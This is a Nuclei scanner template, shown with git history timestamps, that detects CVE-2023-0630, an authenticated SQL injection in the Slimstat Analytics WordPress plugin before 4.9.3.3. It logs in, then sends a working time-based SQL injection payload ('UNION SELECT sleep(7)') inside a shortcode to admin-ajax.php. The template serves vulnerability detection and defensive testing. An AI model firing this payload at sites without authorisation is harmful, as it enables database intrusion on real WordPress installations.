nuclei-templates/http/cves/2023/CVE-2023-0630.yaml

54 lines
1.7 KiB
YAML
Raw Normal View History

2023-06-16 00:22:58 +00:00
id: CVE-2023-0630
info:
name: Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection
author: DhiyaneshDK
severity: high
description: |
The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
reference:
- https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55
- https://wordpress.org/plugins/wp-slimstat
2023-06-16 04:32:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-0630
2023-07-11 19:49:27 +00:00
remediation: Fixed in version 4.9.3.3
2023-06-16 00:22:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-0630
cwe-id: CWE-89
2023-07-15 16:29:17 +00:00
epss-score: 0.03477
2023-06-16 00:22:58 +00:00
cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.90291
2023-06-16 00:22:58 +00:00
metadata:
max-request: 2
verified: true
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: wp-slimstat
product: slimstat_analytics
tags: wpscan,cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated
2023-06-16 00:22:58 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 200'
- 'contains(content_type_2, "application/json")'
- 'contains(body_2, "audioShortcodeLibrary")'
condition: and